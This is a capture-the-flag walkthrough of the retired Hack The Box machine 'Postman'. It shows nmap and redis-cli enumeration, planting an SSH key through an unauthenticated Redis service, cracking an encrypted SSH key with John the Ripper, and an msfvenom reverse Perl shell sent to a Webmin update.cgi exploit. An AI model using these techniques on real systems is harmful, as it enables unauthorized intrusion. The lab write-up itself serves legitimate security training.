HTB is an excellent platform that hosts machines belonging to multiple OSes. It also has some other challenges as well. Individuals have to solve the puzzle (simple enumeration plus pentest) in order to log into the platform and download the VPN pack to connect to the machines hosted on the HTB platform. Note: Only write-ups of retired HTB machines are allowed. The machine in this article, named Postman, is retired. Let’s start with this machine.

The walkthrough

Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN. The Postman machine IP is 10.10.10.160. We will adopt our usual methodology of performing penetration testing. Let’s start with enumeration in order to learn more about the machine. As usual, let’s start with the nmap scan to learn more about the services running on this machine. [CLICK IMAGES TO ENLARGE] «nmap -sC -sV -oA Postman 10.10.10.160»

Let’s start the enumeration based on the discovered ports. The screenshot below is what we can see on port 80.

On port 10000, we got the page below, which led us to redirect to the site on SSL.

On SSL, we got the page below. Seems like we need to figure out the right username and password. In short, we need more enumeration. Going back to step 1, we will run the nmap scan on all ports.

This time we got an additional Redis port as well. «nmap -sC -p- -oA postman.full 10.10.10.160»

Enumerating Redis service with an nmap script to find anything interesting. «nmap –script redis-info -sV -p 6379 10.10.10.160»

Now let’s use Redis tools to enumerate the service as well. Looks like this is accepted with any authentication/authorization «redis-cli -h 10.10.10.160»

We can see the authorized keys using the below command and its location. «CONFIG GET authorized-keys» «CONFIG GET dir» «keys *»

What we can do is this: create a key and register it via Redis service on the system.

Since the key is registered, let’s log into the system. As can be seen below, we were able to log in.

We enumerated to grab the user.txt file but got “permission denied,” as it is owned by a user named Matt.

Enumerating once more results in the encrypted key below. We download it on our system and then try to crack it with John the Ripper.

We use the ssh2john utility to create a hash for this key that can be fed to JTR.

Now we can pass this to JTR. We were able to successfully crack it.

Now using that password, we can escalate our privileges to user Matt. We grab user.txt file.

Let’s use the same creds to log into the service we have on port 10000. We also discover that this version has a ready exploit at https://www.exploit-db.com/exploits/46984, but it is a Metasploit module. Let’s replicate that outside Metasploit.

Let’s get a reverse Perl shell using msfvenom, like below. «msfvenom -p cmd/unix/reverse_perl LHOST= LPORT=4422 -f raw > rshell.pl» Let’s Base64-encode it.

And now urlencode the complete payload.

The exploit is at /package-updates/update.cgi. Below, we can see that we have incorporated the URL-encoded payload.

As soon as we executed it, we got a call back on our listener.

We enumerate to grab root.txt

This was an interesting machine which required simple enumeration to connect the dots. We will continue this series with more such interesting HTB machines.